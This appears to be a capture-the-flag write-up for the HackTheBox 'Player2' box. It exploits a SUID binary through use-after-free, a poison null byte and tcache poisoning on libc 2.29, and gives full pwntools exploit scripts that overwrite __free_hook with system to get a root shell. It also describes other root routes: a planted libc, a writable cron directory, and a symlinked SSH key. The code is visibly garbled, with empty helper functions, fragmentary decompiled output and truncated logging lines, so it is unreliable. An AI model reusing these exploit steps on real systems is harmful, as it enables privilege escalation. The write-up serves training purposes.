  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */

void main(void)
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("protobs@player2:~$ ");
  switch(local_28[0]) {
  case '0':
  case '1':
  case '2':
  case '3':
  case '4':
  case '5':
    puts("[!] Invalid option. Enter \'0\' for available options.");
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */

Basically, there are two bugs, a poison null byte and a UAF.  UAF comes from the fact that the game struct, which belongs to the 0x40 tcache bin due to 0x38 allocations, does not zero out the pointer to description when freed.  Therefore, we can make a game with a description, free it, get the same game chunk back with another allocation, and get the same description by just setting the size as 0 as the pointer will remain the same.  And in the alloc function, there is also a poison null byte due to the way it read in our description from how it indexes to attach the null byte (note the bug there).  Using the UAF, we can grab both a heap and libc leak.  Heap leak can be grabbed from tcache bin pointers.  Libc leak can be grabbed from unsorted bin pointers, which can easily be done since there is no limit to how big we allocate, so we can just allocate some bins in the largebin size area to fall into unsorted bin. 

As for the poison null byte, it's a similar concept as older poison null bytes.  Only difference is that in libc 2.29, there is the following check:

    if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);

Bypassing this isn't too hard.  Just forge a fake chunk right above the region you want to coalesce with the correct size (remember the prev_size issue too in poison null bytes; that prev_size determines where it is going to check and how much it will coalesce by!).  However, you will also need some heap pointers to point back to the location of the forged chunk to bypass a more classic heap fd->bk =P and bk->fd =P unlink macro check. 

Below is the unlink macro:

#define unlink(AV, P, BK, FD) {                                            \
   if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
     malloc_printerr ("corrupted size vs. prev_size");                  \
   FD = P->fd;                                      \
   BK = P->bk;                                      \
   if (__builtin_expect (FD->bk != P || BK->fd != P, 0))              \
     malloc_printerr ("corrupted double-linked list");                  \
   else {                                      \
       FD->bk = BK;                                  \
BK->fd = FD; 

Somehow I missed the really obvious massive heap overflow above from the buffer issue, as sampriti, R4J, and hevr pointed out.  Notice how the buffer for the name and the desc are on the same place on the stack, but the fgets for the name allows for a lot more space on the buffer (0x400) while the read for the heap is capped at 0x200.  We can simply fill the amount of the heap buffer all the way and also do something similar for name originally... copying using strlen will copy everything over, allowing for a massive heap overflow, and doing the rest of the classic heap stuff with tcache to probably get arbitrary write.  This method of exploitation would have been much simpler.

Anyways, afterwards, you should be able to coalesce, get heap overlap, and pop a shell.  Now let's write the exploit.  Make sure to debug along if you were not able to solve this!

First thing I do is write all the helper functions.  

from pwn import *

#context.log_level = 'debug'
#no pie
bin = ELF('./Protobs')
libc = ELF('./')

p = process('./Protobs')

#it's suid so life becomes even easier!
#bss at 0x603060
def wait():

def alloc(size, desc, game='', contrast=0,gamma=0,xres=0,yres=0,controller=0):
    if size is not 0:

def free(index):

def show(index):

Then I got a heap and libc leak using the UAF bug above.  It is important to keep track of how many tcachebins you have left in the 0x40 and try to keep it filled up, especially before the poison null byte, so they do not interfere with your poison null byte setup.  Hopefully, my comments below will help clear up any confusion.

small = 0x198
big = 0x4f0 #500
#fill with 6 tcache bins
for i in range(3):
    alloc(0x30, 'A' * 0x20)
for i in range(3): 
    free(i) #6 chunks in tcache
alloc(0, 'blah') 
show(0) #5 chunks in tcache
p.recvuntil('[ Description         ]: ')
heapleak = p.recvline()[:-1]
heapleak = u64(heapleak.ljust(8, '\x00'))'Heap leak: ' + hex(heapleak)) 
alloc(0x500, 'A' * 0x30) #4 chunks in tcache
alloc(0x200, 'A' * 0x30) #3 chunks in tcache, chunk index 2
free(2) #prevent top consolidation, back to 4 chunks in tcache
free(1) #for libc leaking, 5 chunks in tcache
alloc(0, 'blah') #4 chunks in tcache, chunk 1
show(1) #1 is taken up
p.recvuntil('[ Description         ]: ')
libcleak = p.recvline()[:-1]
libcleak = u64(libcleak.ljust(8, '\x00'))
libc.address = libcleak -  0x1e4c40 - 96"Libc Base: " + hex(libc.address)) 

As I mentioned earlier, I would prefer to have all the tcachebins for the game metadata structs filled so they do not interfere with my poison null byte setup.

#fill rest of tcache
for i in range(4):
    alloc(0x200, 'A' * 0x20) #2, 3, 4, 5
#empty it
for i in range(3):
    alloc(0, '') #6, 7, 8
for i in range(7):
 #7 chunks in 0x40 tcache
#tcache should be filled now

Now it's time for the poison null byte.  Just remember what I said before and you should be fine.  There is however one thing to note, and it's the size I chose to overwrite.  I allocated 0x4f0 for it so it becomes 0x500.  Not only do I avoid having to fill tcachebin for it before it does the coalesce/unsorted mechanism, but when I overwrite it, it will become 0x501 (prev in use is on) to 0x500.  This way, I won't have to deal with the libc checks that check the chunks afterwards as the size did not actually change.  Also, you will need to slowly write the poison null bytes by writing backwards byte by byte due to the way it transfers the data from the buffer to the heap in the allocation function.  You will also need to make sure you have a freed chunk in that coaelesced region to create heap overlap afterwards.

#now time for poison null byte
alloc(0x50, 'C' * 0x38 + p64(heapleak+0xa50)) #2
#wipe out null bytes to set up forged chunk correctly
for i in range(6):
    alloc(0x50, 'C' * (0x38-i-1))
free(2) #continue setting up forged chunk
alloc(0x50, 'C' * 0x30 + p64(heapleak+0xa50))
for i in range(6):
    alloc(0x50, 'C' * (0x30-i-1))
alloc(0x50, 'C' * 0x28 + p64(small+0x38)) #2
#forged chunk should be good to go

alloc(small, 'D' * 0x100) #3
alloc(big, 'E' * 0x100) #4
alloc(0x210, '') #prevent top consolidation #5
alloc(small, 'F' * (small)) #poison null byte
#set up fake prev_size
for i in range(6):
    alloc(small, 'F' * (small-i-1))
alloc(small, 'F'*(small-0x8)+p64(small+0x38))
free(4) #chunk coaelesced now

Now you have coalesced region with a free chunk pointing to the same region, thereby creating heap overlap.  Technically, tcache poison by overwriting the fd pointers is very trivial, but beware the tcache count check.  This can be handled by allocating several tcache bins of the same size and then putting them all in the respective tcache bins, so when you poison the tcache bins, you will have enough for tcache counts to not worry about it becoming -1 and thus not giving the target region back.  Then overwrite free hook with system and pop a shell with a string since you control the rdi value for free.

alloc(0x20, 'temp') 
alloc(0x20, 'ZZZZ') 
alloc(0x60, 'Y' * 0x20) #6
alloc(0x60, 'Y'*0x20) #so tcache count doesn't drop, bypass that check
alloc(0x60, 'Y' * 0x20)
alloc(small, 'A' * (0x60 + 0x70 + 0x10) + p64(libc.symbols['__free_hook'])) #overlapped chunks 
alloc(0x60, '')
#above was a tcache poison, now overwrite malloc hook
magic = [0xe237f, 0xe2383, 0xe2386]
alloc(0x60, p64(libc.symbols['system'])) #8, because it frees the desc first, we can't have it do that
alloc(0x300, '', game='/bin/bash\x00') #9

For remote version, I just used ssh from pwn tools and slowed down the timing.

from pwn import *

#context.log_level = 'debug'
#no pie
bin = ELF('./Protobs')
libc = ELF('./')

remoteShell = ssh(host = 'player2.htb', user='observer', keyfile='./key')
p = remoteShell.process('./Protobs')

#it's suid so life becomes even easier!
#bss at 0x603060
def wait():

def alloc(size, desc, game='', contrast=0,gamma=0,xres=0,yres=0,controller=0):
    if size is not 0:

def free(index):

def show(index):

small = 0x198
big = 0x4f0 #500
#fill with 6 tcache bins
for i in range(3):
    alloc(0x30, 'A' * 0x20)
for i in range(3): 
    free(i) #6 chunks in tcache
alloc(0, 'blah') 
show(0) #5 chunks in tcache
p.recvuntil('[ Description         ]: ')
heapleak = p.recvline()[:-1]
heapleak = u64(heapleak.ljust(8, '\x00'))'Heap leak: ' + hex(heapleak)) 
alloc(0x500, 'A' * 0x30) #4 chunks in tcache
alloc(0x200, 'A' * 0x30) #3 chunks in tcache, chunk index 2
free(2) #prevent top consolidation, back to 4 chunks in tcache
free(1) #for libc leaking, 5 chunk in tcache
alloc(0, 'blah') #4 chunks in tcache, chunk 1
show(1) #1 is taken up
p.recvuntil('[ Description         ]: ')
libcleak = p.recvline()[:-1]
libcleak = u64(libcleak.ljust(8, '\x00'))
libc.address = libcleak -  0x1e4c40 - 96"Libc Base: " + hex(libc.address)) #know that read maxes out at 0x200
#fill rest of tcache
for i in range(4):
    alloc(0x200, 'A' * 0x20) #2, 3, 4, 5
#empty it
for i in range(3):
    alloc(0, '') #6, 7, 8
for i in range(7):
 #7 chunks in 0x40 tcache
#tcache should be filled now
#now time for poison null byte
alloc(0x50, 'C' * 0x38 + p64(heapleak+0xa50)) #2
#wipe out null bytes to set up forged chunk correctly
for i in range(6):
    alloc(0x50, 'C' * (0x38-i-1))
free(2) #continue setting up forged chunk
alloc(0x50, 'C' * 0x30 + p64(heapleak+0xa50))
for i in range(6):
    alloc(0x50, 'C' * (0x30-i-1))
alloc(0x50, 'C' * 0x28 + p64(small+0x38)) #2
#forged chunk should be good to go

alloc(small, 'D' * 0x100) #3
alloc(big, 'E' * 0x100) #4
alloc(0x210, '') #prevent top consolidation #5
alloc(small, 'F' * (small)) #poison null byte
#set up fake prev_size
for i in range(6):
    alloc(small, 'F' * (small-i-1))
alloc(small, 'F'*(small-0x8)+p64(small+0x38))
free(4) #chunk coaelesced now
alloc(0x20, 'temp') 
alloc(0x20, 'ZZZZ') 
alloc(0x60, 'Y' * 0x20) #6
alloc(0x60, 'Y'*0x20) #so tcache count doesn't drop, bypass that check
alloc(0x60, 'Y' * 0x20)
alloc(small, 'A' * (0x60 + 0x70 + 0x10) + p64(libc.symbols['__free_hook'])) #overlapped chunks 
alloc(0x60, '')
magic = [0xe237f, 0xe2383, 0xe2386]
alloc(0x60, p64(libc.symbols['system'])) #8, because it frees the desc first, we can't have it do that
alloc(0x300, '', game='/bin/sh\x00') #9

And you should now have a root shell!  During this box's lifecycle, there were actually several other unintendeds and alternative methods that made this box easier, one of which was the large heap overflow I mentioned above, which could make tcache poisoning trivial.

Another one D3v17 and I discovered early on when stracing the binary was that having it patched-elf'd made it search from ./tls/x86_64/x86_64/ and a few other local sub-directories first before checking the local directory for the libc file. We had write permissions and were able to create one of those directories with a patched libc that redirected one of the program function calls to just call system("/bin/sh"). This was patched later on.

Xct also took root blood first with an unintended related to a cron job that would execute python files as root from a directory www-data can write to. These files were and from /var/www/product/protobs, opening up an easy gateway to root. This path was patched as well.

Lastly, here is a one more unintended/alternative path I heard from both D3v17 and xct. To quote D3v17: "A user can upload inotifywait (static binary) and then start monitoring /home folder using inotifywait -m -r /home. Inotifywait will show that /.ssh/id_rsa is opened,read and closed. So the user can replace id_rsa with a symlink to /root/root.txt and read the flag using mqtt."

Regardless, this box was still very fun! Congrats to b14ckh34rt and MrR3boot, who always produces engaging and exciting content!